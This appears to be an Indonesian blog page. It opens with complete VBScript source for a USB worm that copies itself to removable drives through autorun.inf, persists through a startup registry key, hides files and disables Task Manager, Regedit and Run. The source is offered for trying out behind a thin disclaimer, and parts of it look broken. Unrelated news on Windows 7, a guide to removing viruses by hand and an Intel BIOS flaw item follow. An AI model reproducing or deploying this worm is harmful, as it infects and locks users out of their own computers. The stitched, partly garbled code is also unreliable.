Loetoeye

‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//
on error resume next

‘//–Dim kata-kata berikut ini–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,system,nt,check,sd

‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe system.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\batch- system.dll.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “\batch- system.dll.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “\batch- system.dll.vbs “)
tf.attributes = 39

‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket

for each flashdrive in fs.drives
‘//–Cek Drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then

‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//
set tf=fs.getfile(flashdrive.path &”\system.dll.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\system.dll.vbs “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”\system.dll.vbs “)
tf.attributes = 39

‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next

‘//–Manipulasi Registry–//

set system = createobject(”WScript.Shell”)

‘//–Manip – Ubah Title Internet Explorer menjadi SYSTEM32–//
system.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” SYSTEM32 “

‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//
system.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”

‘//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–//
system.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
system.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
system.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
system.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
system.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”

‘//–Manip – Disable klik kanan–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”

‘//–Manip – Munculkan Pesan Setiap Windows Startup–//
system.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm system. Variant from WIN32, don’t panic all data are safe.”

‘//–Manip – Aktif setiap Windows Startup–//
system.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- system.dll.vbs “

‘//–Manip – Ubah RegisteredOwner dan Organization–//
system.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “win32”
system.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”system”

‘//–Nah kalau kode dibawah ini gw nggak tau, tolong kalo ada yang bisa untuk menjelaskan–//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
‘Akhir dari Kode

Masih nanya lagi tentang nama virusnya kenapa harus system.dll.vbs? apa ga bisa di ganti atau dirubah? tentu bisa, asalkan scrip diatas harus dirubah juga sama nama yang mau lo pakai nanti. Kalo “dll” itu fungsinya buat apa? gausah di pikirin itu mah ga da fungsinya, cuma buat iseng – iseng aja biar lo pada bingung. Wkakakakakaka …!!!!

Tapi gw tekankann lagi untuk tidak menyalah gunakan scrip ini. Scrip ini gw bahas cuma untuk perbandingan aja dari scrip – scrip yang sebelumnya aj, gw ga mau bertanggung jawab kalo ada apa – apa nantinya karena nih scrip bukan sepenuhnya dari ide gw … !!!!

# Selamat Mencoba

Masih ingatkah Anda ketika Microsoft mulai membatasi penjualan Windows XP dalam rangka menjelang terbitnya Windows 7 yang mungkin akan menggantikan Vista? Namun, sepertinya Microsoft harus mengubah semua prosedur yang telah dibuat sebelumnya mengenai batas hidup Windows XP.

Analis Microsoft Michael Cherry mengatakan bahwa ‘saat pengembang dalam jumlah sebesar itu berkumpul, Anda menginginkan mereka untuk pulang dengan sesuatu yang dapat mereka kutak-katik. Microsoft ingin melakukan lebih dari sekedar menjelaskan Windows 7 kepada para pengembang secara lisan.’

Apabila hanya boleh memilih satu dari dua konferensi yang ada, Cherry lebih cenderung pada WinHEC yang memiliki hadirin lebih sedikit. Menurut Cherry, semakin sedikit jumlahnya, semakin menarik untuk Microsoft yang kali ini serius dalam meningkatkan kinerja Windows ‘kemungkinan khawatir versi awal Windows akan diulas. Mereka tidak akan senang apabila seseorang memutuskan untuk menguji kinerja Windows yang masih berada dalam versi beta. Saat dirilis, pasti ada saja yang akan mempublikasikan kesan mereka dalam menggunakan Windows 7.’

Contohnya, lihat saja fakta bahwa versi beta dari IE8 dan Chrome yang dirilis belum lama ini. Kedua browser ini diulas secara mendalam, termasuk dalam segi kinerja. Begitu juga dengan versi beta Vista yang saat pertama kali dikeluarkan dikritik keras oleh beberapa situs.

Hingga minggu lalu, Microsoft belum mengatakan apapun tentang Windows 7 beta. Akan tetapi pada hari Rabu minggu lalu, Christina Storm, seorang program manager Microsoft mengatakan di blog Engineering Windows 7 bahwa mereka akan mulai mengumpulkan para penguji beta melalui prosedur biasa Microsoft melalui connect.microsoft.com/.

Walaupun secara resmi Microsoft menjadwalkan Windows 7 untuk dirilis pada bulan Januari 2010, InternetNews mengatakan bahwa kalender internal Microsoft sendiri menunjuk pada 3 Juni 2009 sebagai tanggal peluncuran Windows 7.

Menghadapi serangan berbagai macam virus komputer – dengan OS Microsoft Windows tentu saja – kebanyakan orang akan memikirkan bagaimana mendapatkan antivirus terbaru dan antivirus khusus untuk virus lokal tertentu karena kebanyakan software antivirus tidak mampu mendeteksinya. Berbeda dengan cara pikir yang sangat umum ini, saya menawarkan solusi alternatif menghadapi virus lokal yaitu membasminya secara manual.

Virus adalah program/aplikasi (=serangkaian perintah) yang mampu memperbanyak diri. Kebanyakan programer membuat virus-virus ini sebagai serangkaian perintah yang menyusup ke dalam barisan perintah-perintah dalam aplikasi-aplikasi lain. Virus-virus tertentu bahkan diprogram mampu menyelinap dalam master boot record ataupun sektor-sektor tertentu dalam disk dengan perlindungan khusus tanpa bisa dikenali pengguna sebagai file. Sayangnya pekerjaan cerdik ini tidak berlaku untuk kebanyakan virus lokal yang keberadaannya sangat mencolok dan mengundang permusuhan.

Berdasarkan titik lemah inilah kita dapat membasmi virus lokal secara manual. Ada dua acuan umum dalam membasmi virus secara manual yaitu menghentikan running virus dan melenyapkan virus-virus. Berdasarkan dua acuan ini anda dapat mengembangkan sendiri strategi anda tergantung kasus yang anda hadapi.

Bagian I: Menghentikan Running Virus

Untuk serangan virus yang dibuat dengan Visual Basic (VB) – untungnya kebanyakan virus lokal dibuat dengan VB – anda dapat menghentikan running virus dengan cara ‘menyingkirkan’ msvbvm50.dll dan msvbvm60.dll yang berada dalam direktori c:windowssystem32 yang merupakan virtual machine dari program-program yang dibuat dengan VB. Adapun istilah ‘menyingkirkan’ bisa diwujudkan dengan berbagai cara tergantung keadaan ataupun selera, yaitu dihapus (tidak dianjurkan), dipindah ke folder lain, atau diganti dengan nama lain. Selain itu caranya bisa dilakukan dengan berbagai cara tergantung dari tingkat serangan virus mulai dari menggunakan windows explorer, command prompt emulator pada windows (ketika virus menonaktifkan windows explorer), ataupun harus menjalankan windows dalam mode ‘save mode with command prompt only’ dengan menekan F8 pada awal windows startup untuk menampilkan startup menu. Jika virus masih tetap berjalan, berarti virus tidak dibuat dengan VB dan untuk menjalankan langkah selanjutnya anda harus menggunakan Linux atau OS lain yang tidak terpasang emulator untuk program-program windows.

Bagian II: Menghapus Virus-virus

Untuk melenyapkan virus-virus yang harus anda lakukan adalah mengumpulkan semua file aplikasi melalui find dengan entri nama *.exe, mengidentifikasi aplikasi-aplikasi yang merupakan virus, dan menghapus mereka. Jika menu find telah dinonaktifkan oleh virus, anda bisa memanggilnuya dengan menekan F3 (jauh lebih mudah daripada harus mengedit registry editor). Memvonis aplikasi sebagai virus sangat tergantung dari pengalaman dan insting anda, karena ciri-cirinya bisa sangat bervariasi; tetapi yang harus menjadi acuan adalah bahwa anda mencari hal-hal ‘tidak seperti yang semestinya dan berada di tempat semestinya’ atau terkesan disembunyikan. Aplikasi-aplikasi dengan icon Microsoft word Document atau icon folder bisa langsung divonis sebagai virus, tetapi aplikasi dengan ikon biasa pun harus anda curigai jika anda yakin siapapun tidak pernah memindahkannya ke sana. Untuk memperkecil ruang lingkup, anda juga perlu memperhatikan ukuran file karena banyak virus yang masing-masing mempunyai ukuran file sama.

Aplikasi yang telah anda vonis sebagai virus harus dihapus langsung dengan menekan sift+delete. Sebelumnya, pastikan semua data telah anda selamatkan dengan mengkopi isi dokumen dan di-paste di tempat lain dalam keadaan virus tidak runnig. Selamat beraksi.

Salah satu demonstrasi yang menarik dalam Black Hat tahun ini adalah sebuah penemuan dari Johanna Rutkowska, yang telah menemukan kelemahan dari BIOS motherboard Intel yang dapat menjadi “pil pahit” dari hypervisor Xen ini. Detail mengenai kelemahan motherboard Intel memang belum dirinci untuk saat ini, namun Intel hanya memberikan detail garis besarnya.

Menurut saran Rutkowska dalam blognya, bahwa perbaikan yang nantinya akan dilakukan oleh Intel diharapkan dapat mencegah software yang mudah dimodifikasi yang berjalan di SMM (System Management Mode). SMM merupakan privilege operasi lingkungan yang berjalan di luar kontrol sistem operasi. Software ‘jahat’ akan berjalan dalam lingkungan ini, yang meliputi banyak operasi didalamnya. Level privilege Adminstratif nantinya yang akan bertanggung jawab atas perbaikan kelemahan BIOS motherboard Intel ini. Update BIOS untuk memperbaiki masalah ini akan menginfeksi semua motherboard brand Intel.

Motherboard Intel yang terinfeksi termasuk Intel DQ35JO, DQ35MP, DP35DP, DG33FB, DG33BU, DG33TL, DX38BT dan MGM965TW (Mobile). Pengumuman Intel ini juga menjadi peringatan bagi user bahwa level BIOS memiliki potensi untuk memberikan efek samping pada sistem computer dan untuk semua sistem operasi. Dengan adanya masalah ini, Intel kemudian menjadi frustrasi, karena bagaimanapun pihaknya belum pernah melihat tipe eksploitasi ini dalam motherboard-nya, dan Intel memutuskan untuk menambal lubang kelemahan tersebut untuk mencegah hal yang sama terjadi di masa mendatang.

Seorang bos enginner Windows, Steven Sinofsky, mengungkapkan bahwa pihak Microsoft telah me-launching blog Windows 7. Menurut rencana Sinofsky, blog Windows 7 tersebut nantinya dapat digunakan share beberapa detail dari Windows 7.

“PDC atau Professional Developers Conference yang akan diselenggarakan tanggan 27 Oktober nanti, dan WinHEC atau Windows Hardware Engineering Conference dalam mingu berikutnya, akan merepresentasikan sarana pertama kali, dimana kami dapat menyediakan informasi teknis mengenai Windows 7. Blog ini juga akan menyediakan konteks dengan posting regular selama 2 bulan ke depan, mengenai pengembangan Windows 7 di belakang layar.”, kata Sinofsky dan Jon Devaan, kepala sistem operasi Windows Core.

Menurut Sinofsky, Microsoft akan memasukkan Windows 7 pada PDC dalam beberapa manner. Sinofsky mengakui bahwa Microsoft tidak akan berbicara banyak, namun kembali kepada line standard Microsoft, bahwa perusahaan tersebut tidak akan melakukan share detail peluncuran selama mereka belum mencapai level penyelesaian yang nyata. Sinofsky menuturkan beberapa detail dari Windows 7 yang akan menggunakan driver yang sama dan basic kernel dari Windows Vista, yang menurut rencana akan dipasarkan pada Januari 2010, tiga tahun setelah peluncuran Windows Vista. Microsoft juga akan memasukkan interface multi-touch ke dalam Windows 7.

“Kami sangat percaya bahwa kesuksesan Windows 7 berasal dari keterbukaan, kejujuran dan diskusi mengenai bagaimana kami menyeimbangkan interest dan software dengan skala Windows. Kami menjanjikan akan membuat sebuah dialog dan segala detailnya dalam blog Windows 7 ini.”, kata Sinofsky.

Sinofsky menambahkan, bahwa Microsoft telah merangkul lebih banyak dan lebih dalam dengan pembuat beberapa pembuat computer lainnya, untuk ikut menjadi bagian dari proses desain Windows 7. Menurut rencana, blog Windows 7 ini mulai siap digunakan pada bulan Oktober mendatang.

www.BeritaNET.com